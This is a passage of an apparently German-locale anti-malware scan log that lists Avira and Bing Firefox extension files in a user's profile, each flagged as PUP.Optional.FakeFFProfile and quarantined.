PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\on_off_switch.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\setting.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Top.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\blocked\message.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\blocked-count.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Carousel.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\close_indicator.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\faq.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\FeedbackLink.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\help.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\alternatives.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Dash\PUA\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Close.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Dash.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Domain.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\PUAPage.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchClassification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\SearchPUA.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Settings.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\IndicatorBar\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Classification.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Feedback.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\HowToEditTrackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Offers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\TinyTopViewTour.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\html\templates\Tour\Trackers.mustache, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\de-DE.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\en-US.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\es-ES.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\fr-FR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\it-IT.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\i18n\pt-BR.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\expand-arrow.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-attention.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-checks.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\absb-close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\abs_avira_umbrella_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon128.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon16.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon24.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_icon48.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\avira_logo32.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_safe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\classification_unsafe_lg.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\close-offers-bar.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_close_white.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_feedback.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_dark.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_light.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\dash_search_normal.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_empty.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\info_full.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\pua-icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\question-mark.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\scroll-down.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_safe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_unsafe.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\serp_info_warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\settings-24.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\switch-on.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\trackers_icon_nb.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\warning.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\img\white_check.svg, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\blocked.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\init.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\background\background.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\app.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\content.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\locale.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search\search.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports\junitresults.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit\index.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages-sim.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\chrome.manifest, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
